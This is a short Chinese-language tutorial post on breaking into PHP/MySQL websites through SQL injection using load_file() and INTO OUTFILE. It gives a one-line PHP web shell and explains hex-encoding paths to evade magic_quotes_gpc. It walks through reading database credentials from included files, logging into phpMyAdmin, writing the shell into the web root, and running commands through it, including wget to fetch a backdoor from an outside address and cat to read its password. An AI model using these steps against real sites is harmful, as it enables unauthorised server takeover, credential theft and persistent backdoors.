php mysql下的load_file函數與into_out函數

標籤：許可權   地址   建立   訪問   pfile   進位   使用者名稱   版本   滑鼠   

1.MySQL使用者的許可權（mysql.user裡可以查看），file_priv,可以對系統檔案進行讀寫，當然這個檔案要是當前的系統使用者有讀寫權限的。

2.Load_file()函數，讀取檔案內容

3.Into outfile(匯出字元類型的檔案，如文字檔)或into dumpfile(可以匯出二進位，如執行檔案)可以匯出資料庫內容到檔案

4.一句話木馬，<?php system($_REQUEST[cmd];)?>可以執行系統命令

5.滑鼠放網站連結上，在下面狀態列看到php?id=一般說明與資料庫互動

6在顯示位上用user()可以顯示目前使用者，database()顯示當前資料庫名稱，version()資料庫版本(@@version)，@@basedir(顯示資料庫安裝路徑)，@@datadir資料庫的資料路徑

7如果在顯示位上用load_file()載入實體路徑(因為magic_quotes_gpc可能是開啟的轉換成十六進位後可以繞過它的限制，所以要轉換成十六進位)出來的沒有資料庫資訊的話，那麼它包含的檔案一般都有資料庫連接資訊等，再用load_file()載入包含的檔案(依舊轉換成十六進位)

8MySQL除了企業版是不可以遠端連線的，一般都有phpmyadmin，一般在網站URL後面加上phpmyadmin

9利用load_file()載入出包含檔案裡的使用者名稱密碼登入phpmyadmin ,建立新的資料庫，表，欄位，然後再在該資料庫中執行語句select  *  from beach  into   outfile  ‘網站的絕對路徑/匯出檔案的檔案名稱(自己隨便建立建立)’

10.訪問網站的絕對路徑/匯出的檔案名稱.php?看是否匯出成功

訪問網站的絕對路徑/匯出的檔案名稱.php?建立的欄位=ls  列出路徑下的所有檔案

11用wget這個軟體下載指令碼後門：網站的絕對路徑/匯出的檔案名稱.php?建立的欄位=wget+下載的地址

12.下載完成後用網站的絕對路徑/匯出的檔案名稱.php?建立的欄位=ls  列出路徑下的所有檔案看是否下載成功。

13.用網站的絕對路徑/匯出的檔案名稱.php?建立的欄位=mv+原檔案名稱+新檔案名稱

14.訪問網站的絕對路徑/新檔案名稱登入指令檔後門即可(可用網站的絕對路徑/匯出的檔案名稱.php?建立的欄位=cat ./新建立的檔案名稱查看指令碼後門的密碼)

php mysql下的load_file函數與into_out函數